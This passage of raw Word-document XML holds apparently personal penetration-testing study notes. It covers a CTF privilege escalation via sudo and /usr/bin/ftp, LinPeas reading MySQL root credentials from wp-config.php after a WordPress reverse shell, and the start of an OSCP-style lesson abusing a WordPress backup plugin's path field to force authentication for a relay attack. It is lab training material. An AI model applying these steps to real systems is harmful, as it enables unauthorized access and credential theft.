        <w:t xml:space="preserve">cd /home/coldd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="686"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="686"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="977900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="396" name="image389.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image389.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId989"/>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2D97">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="686"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can tell that this encrypted due to the "==" at the end, which is Base64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="686"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We got the user flag which is in encrypted format (base64 format since it ends in "=="). We need to decrypt it. We can use a site called "cyberchef".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="686"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We got the flag but it is in spanish language. By using google translator we can translate this into english.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D9A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="686"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We have successfully found the user flag. Now we need to find the root flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D9B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="686"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here they then did "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">", found </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/ftp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, put it in GTFOBins, and used the sudo section to priv esc to admin, where they found a base64 encoded flag, so they decoded, and then translated from spanish to english</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D9C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D9D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In general, looking at the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> wp-admin </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">page is also good since it's a login page, and if you have credentials than it's useful </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D9E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D9F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the </w:t>
      </w:r>
      <w:hyperlink r:id="rId990">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">BTRSys2.1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DA0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DA1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We saw another way to privilege escalate after getting reverse shell from WordPress. We ran LinPeas and looked at the "Analyzing Wordpress Files" section and the "Searching Wordpress wp-config.php files" section which gave us MySQL credentials for root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DA2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DA3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These sections looked at the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wp-config.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DA4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DA5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DA6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DA7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1kvjj0wmnepv" w:id="404"/>
      <w:bookmarkEnd w:id="404"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Abuse Backup Migration plugin and Relay Attack for priv esc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DA8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DA9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From OSCP (27.5.2. Abuse a WordPress Plugin for a Relay Attack)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DAA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DAB">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the previous section, we retrieved the plaintext password for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">daniela</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and gained access to the WordPress dashboard on INTERNALSRV1. Let's review some of the settings and plugins.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DAC">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll begin with the configured users:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DAD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2108200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 20: Daniela is the only WordPress user" id="235" name="image237.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 20: Daniela is the only WordPress user" id="0" name="image237.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId991"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2108200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 20: Daniela is the only WordPress user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DAE">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 20 shows </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">daniela</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the only user. Next, let's check </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Settings</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">General</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DAF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2095500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 21: General WordPress settings" id="87" name="image98.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 21: General WordPress settings" id="0" name="image98.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId992"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2095500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 21: General WordPress settings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DB0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WordPress Address (URL)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Site Address (URL)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> are DNS names as we assumed. All other settings in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Settings</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> are mostly default values. Let's review the installed plugins next.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DB1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1993900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 22: Installed WordPress Plugins" id="223" name="image260.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 22: Installed WordPress Plugins" id="0" name="image260.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId993"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1993900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 22: Installed WordPress Plugins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DB2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 22 shows three plugins, but only</w:t>
      </w:r>
      <w:hyperlink r:id="rId994">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId995">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Backup Migration</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is enabled. Let's click on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Manage</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which brings us to the plugin configuration page. Clicking through the menus and settings, we discover the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Backup directory path</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DB3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2171700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 23: Backup Migration plugin settings" id="134" name="image131.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 23: Backup Migration plugin settings" id="0" name="image131.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId996"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2171700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 23: Backup Migration plugin settings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DB4">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 23 shows that we can enter a path in this field, which will be used for storing the backup. We may abuse this functionality to force an authentication of the underlying system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DB5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
